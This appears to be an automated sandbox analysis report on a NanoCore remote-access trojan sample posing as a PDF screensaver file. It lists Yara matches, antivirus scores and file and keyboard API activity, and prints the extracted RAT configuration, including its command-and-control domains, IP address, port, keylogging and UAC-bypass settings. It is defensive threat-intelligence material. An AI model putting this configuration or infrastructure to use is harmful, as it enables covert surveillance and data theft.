      Source: Yara matchFile source: 00000021.00000003.467996815.00000000039C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001D.00000003.431239930.000000000132B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000023.00000003.487454794.0000000001773000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001D.00000003.430740099.000000000133E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.373739340.0000000000EC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000016.00000002.376441556.0000000003BE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.375042801.0000000000E92000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000003.310273116.000000000184C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000011.00000003.354054231.0000000001929000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000023.00000003.488033967.00000000017A7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001D.00000003.431128106.000000000130F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000016.00000002.375961002.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000003.310180487.0000000001831000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000003.311013911.0000000004448000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.774805901.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000023.00000003.481255588.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000021.00000003.467618128.0000000000F72000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000011.00000003.353086726.00000000018F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000011.00000003.351714814.000000000195E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000003.310685382.00000000017C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000023.00000003.481046485.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000016.00000002.374007081.0000000000722000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001A.00000003.408839619.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: ihgsvw.exe PID: 5624, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3008, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: ihgsvw.exe PID: 2200, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: ihgsvw.exe PID: 5948, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 2756, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: ihgsvw.exe PID: 5040, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: ihgsvw.exe PID: 2788, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: ihgsvw.exe PID: 5648, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: ihgsvw.exe PID: 5304, type: MEMORYSTR
      Multi AV Scanner detection for submitted file
      Source: 004349256789197.pdf.scr.exeReversingLabs: Detection: 44%
      Source: 004349256789197.pdf.scr.exeVirustotal: Detection: 39%Perma Link
      Multi AV Scanner detection for dropped file
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeReversingLabs: Detection: 26%
      Source: 22.2.RegSvcs.exe.720000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7
      Source: 10.2.RegSvcs.exe.6210000.7.unpackAvira: Label: TR/NanoCore.fadte
      Source: 00000016.00000002.376441556.0000000003BE9000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "d95e5ad5-6193-4689-a919-7befded6", "Group": "ITEego", "Domain1": "december2n.duckdns.org", "Domain2": "december2nd.ddns.net", "Port": 60705, "KeyboardLogging": "Enable", "RunOnStartup": "Enable", "RequestElevation": "Disable", "BypassUAC": "Enable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Enable", "SetCriticalProcess": "Enable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Enable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 29996, "MutexTimeout": 4996, "LanTimeout": 2500, "WanTimeout": 8009, "BufferSize": "02000100", "MaxPacketSize": "", "GCThreshold": "", "BypassUserAccountControlData": "<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n <RegistrationInfo />\r\n <Triggers />\r\n <Principals>\r\n <Principal id=\"Author\">\r\n <LogonType>InteractiveToken</LogonType>\r\n <RunLevel>HighestAvailable</RunLevel>\r\n </Principal>\r\n </Principals>\r\n <Settings>\r\n <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n <AllowHardTerminate>true</AllowHardTerminate>\r\n <StartWhenAvailable>false</StartWhenAvailable>\r\n <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n <IdleSettings>\r\n <StopOnIdleEnd>false</StopOnIdleEnd>\r\n <RestartOnIdle>false</RestartOnIdle>\r\n </IdleSettings>\r\n <AllowStartOnDemand>true</AllowStartOnDemand>\r\n <Enabled>true</Enabled>\r\n <Hidden>false</Hidden>\r\n <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n <WakeToRun>false</WakeToRun>\r\n <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n <Priority>4</Priority>\r\n </Settings>\r\n <Actions Context=\"Author\">\r\n <Exec>\r\n <Command>\"#EXECUTABLEPATH\"</Command>\r\n <Arguments>$(Arg0)</Arguments>\r\n </Exec>\r\n </Actions>\r\n</Task"}
      Source: 004349256789197.pdf.scr.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: 004349256789197.pdf.scr.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
      Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: 004349256789197.pdf.scr.exe, 00000000.00000000.244080048.0000000000403000.00000002.00000001.01000000.00000003.sdmp, 004349256789197.pdf.scr.exe, 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: RegSvcs.pdb, source: RegSvcs.exe, 0000000A.00000003.315104823.0000000001033000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000000.310040164.0000000000362000.00000002.00000001.01000000.0000000D.sdmp
      Source: Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\NanoProtectPlugin\NanoProtectClient\obj\Debug\NanoProtectClient.pdb source: RegSvcs.exe, 0000000A.00000002.784950885.0000000006200000.00000004.00000001.00040000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.774805901.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000016.00000002.376441556.0000000003BE9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000016.00000002.375961002.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: RegSvcs.pdb source: RegSvcs.exe, 0000000A.00000003.315104823.0000000001033000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000000.310040164.0000000000362000.00000002.00000001.01000000.0000000D.sdmp
      Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini
      Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user
      Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppData\Roaming
      Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
      Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppData
      Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: 0_2_003DA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: 0_2_003EC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: 0_2_003FB348 FindFirstFileExA,
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00C0E387 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00C0D836 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00C1A0FA SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00C1A488 FindFirstFileW,Sleep,FindNextFileW,FindClose,
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00C165F1 FindFirstFileW,FindNextFileW,FindClose,
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00BDC642 FindFirstFileExW,
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00C172E9 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00C17248 FindFirstFileW,FindClose,

      Networking

      barindex
      Uses dynamic DNS services
      Source: unknownDNS query: name: december2n.duckdns.org
      Source: unknownDNS query: name: december2nd.ddns.net
      C2 URLs / IPs found in malware configuration
      Source: Malware configuration extractorURLs: december2n.duckdns.org
      Source: Malware configuration extractorURLs: december2nd.ddns.net
      Source: Joe Sandbox ViewASN Name: SPD-NETTR SPD-NETTR
      Source: Joe Sandbox ViewIP Address: 212.193.30.230 212.193.30.230
      Source: Joe Sandbox ViewIP Address: 212.193.30.230 212.193.30.230
      Source: global trafficTCP traffic: 192.168.2.7:49714 -> 212.193.30.230:60705
      Source: 004349256789197.pdf.scr.exe, 00000000.00000003.264105403.0000000006D09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
      Source: 004349256789197.pdf.scr.exe, 00000000.00000003.264105403.0000000006D09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
      Source: 004349256789197.pdf.scr.exe, 00000000.00000003.264105403.0000000006D09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
      Source: 004349256789197.pdf.scr.exe, 00000000.00000003.264105403.0000000006D09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
      Source: 004349256789197.pdf.scr.exe, 00000000.00000003.264105403.0000000006D09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
      Source: 004349256789197.pdf.scr.exe, 00000000.00000003.264105403.0000000006D09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
      Source: 004349256789197.pdf.scr.exe, 00000000.00000003.264105403.0000000006D09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
      Source: 004349256789197.pdf.scr.exe, 00000000.00000003.264105403.0000000006D09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr306
      Source: 004349256789197.pdf.scr.exe, 00000000.00000003.264105403.0000000006D09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr606
      Source: RegSvcs.exe, 0000000A.00000002.774805901.0000000002C31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: 004349256789197.pdf.scr.exe, 00000000.00000003.264105403.0000000006D09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
      Source: 004349256789197.pdf.scr.exe, 00000000.00000003.264105403.0000000006D09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
      Source: 004349256789197.pdf.scr.exe, 00000000.00000003.264105403.0000000006D09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/autoit3/
      Source: 004349256789197.pdf.scr.exe, 00000000.00000003.264105403.0000000006D09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
      Source: unknownDNS traffic detected: queries for: december2n.duckdns.org
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00C0A54A GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,
      Source: RegSvcs.exe, 0000000A.00000002.785005873.0000000006210000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: RegisterRawInputDevices

      E-Banking Fraud

      barindex
      Yara detected Nanocore RAT
      Source: Yara matchFile source: 29.3.ihgsvw.exe.133eea0.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 21.3.ihgsvw.exe.ec6330.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegSvcs.exe.6210000.7.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 17.3.ihgsvw.exe.1929698.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 33.3.ihgsvw.exe.fa1920.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.3.ihgsvw.exe.17f8880.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 35.3.ihgsvw.exe.1810638.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 22.2.RegSvcs.exe.3c3560b.4.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 33.3.ihgsvw.exe.f38910.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 17.3.ihgsvw.exe.19926a8.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 22.2.RegSvcs.exe.3c3b041.5.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.3.ihgsvw.exe.17f8880.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 17.3.ihgsvw.exe.1929698.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 26.3.ihgsvw.exe.12c76a0.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 17.3.ihgsvw.exe.19926a8.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 22.2.RegSvcs.exe.720000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 29.3.ihgsvw.exe.133eea0.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 26.3.ihgsvw.exe.12c76a0.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 29.3.ihgsvw.exe.133eea0.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 26.3.ihgsvw.exe.13306b0.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 35.3.ihgsvw.exe.1810638.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 29.3.ihgsvw.exe.12d5e90.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 26.3.ihgsvw.exe.12c76a0.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 21.3.ihgsvw.exe.f2f340.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 22.2.RegSvcs.exe.3c3b041.5.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 21.3.ihgsvw.exe.f2f340.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 21.3.ihgsvw.exe.ec6330.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 26.3.ihgsvw.exe.13306b0.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 21.3.ihgsvw.exe.f2f340.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 29.3.ihgsvw.exe.12d5e90.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 17.3.ihgsvw.exe.1929698.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 17.3.ihgsvw.exe.19926a8.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 35.3.ihgsvw.exe.17a7628.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegSvcs.exe.6214629.6.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 35.3.ihgsvw.exe.1810638.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.3.ihgsvw.exe.1861890.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.3.ihgsvw.exe.1861890.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 17.3.ihgsvw.exe.1929698.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 33.3.ihgsvw.exe.f38910.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 17.3.ihgsvw.exe.19926a8.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 22.2.RegSvcs.exe.3c307ce.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 35.3.ihgsvw.exe.17a7628.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 33.3.ihgsvw.exe.f38910.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.3.ihgsvw.exe.17f8880.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 29.3.ihgsvw.exe.133eea0.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 35.3.ihgsvw.exe.1810638.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 21.3.ihgsvw.exe.f2f340.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.3.ihgsvw.exe.1861890.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegSvcs.exe.6210000.7.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.3.ihgsvw.exe.17f8880.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.3.ihgsvw.exe.1861890.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 33.3.ihgsvw.exe.f38910.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 26.3.ihgsvw.exe.12c76a0.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 33.3.ihgsvw.exe.fa1920.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 00000011.00000003.352579534.0000000001962000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000011.00000003.353786178.0000000004299000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000011.00000003.351627736.000000000192A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001A.00000003.407827944.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001A.00000003.408428728.0000000001293000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000021.00000003.467106466.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.785005873.0000000006210000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001D.00000003.431923501.0000000003C1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000023.00000003.486991212.00000000017DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001D.00000003.431564388.00000000012A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000003.309488610.000000000182E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.373949530.0000000000EFB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000021.00000003.467835981.0000000000F05000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000021.00000003.468424506.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001D.00000003.430480318.00000000012D6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000023.00000003.487823598.00000000042C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.375313756.0000000003637000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000003.311176660.00000000017F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001D.00000003.430608111.000000000130B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000011.00000003.352185052.0000000001992000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.375626664.0000000000EC6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001A.00000003.408249022.0000000001300000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000003.309754638.0000000001861000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.374648689.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000011.00000003.352676374.000000000197E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000023.00000003.482858075.0000000001810000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001A.00000003.408583600.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000003.309384867.00000000017F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.374247545.0000000000F2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.374514988.0000000000F00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000023.00000003.487203996.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001D.00000003.432175450.00000000012D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000021.00000003.467996815.00000000039C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001D.00000003.431239930.000000000132B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000023.00000003.487454794.0000000001773000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001D.00000003.430740099.000000000133E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.373739340.0000000000EC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000016.00000002.376441556.0000000003BE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.375042801.0000000000E92000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000003.310273116.000000000184C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000011.00000003.354054231.0000000001929000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000023.00000003.488033967.00000000017A7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001D.00000003.431128106.000000000130F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000016.00000002.375961002.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000003.310180487.0000000001831000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000003.311013911.0000000004448000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.774805901.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000023.00000003.481255588.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000021.00000003.467618128.0000000000F72000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000011.00000003.353086726.00000000018F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000011.00000003.351714814.000000000195E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000003.310685382.00000000017C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000023.00000003.481046485.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000016.00000002.374007081.0000000000722000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001A.00000003.408839619.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: ihgsvw.exe PID: 5624, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3008, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: ihgsvw.exe PID: 2200, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: ihgsvw.exe PID: 5948, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 2756, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: ihgsvw.exe PID: 5040, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: ihgsvw.exe PID: 2788, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: ihgsvw.exe PID: 5648, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: ihgsvw.exe PID: 5304, type: MEMORYSTR

      Operating System Destruction

      barindex
      Protects its processes via BreakOnTermination flag
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: 01 00 00 00

      System Summary

      barindex
      Malicious sample detected (through community Yara rule)
      Source: 29.3.ihgsvw.exe.133eea0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 29.3.ihgsvw.exe.133eea0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 29.3.ihgsvw.exe.133eea0.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 29.3.ihgsvw.exe.133eea0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 21.3.ihgsvw.exe.ec6330.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 21.3.ihgsvw.exe.ec6330.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
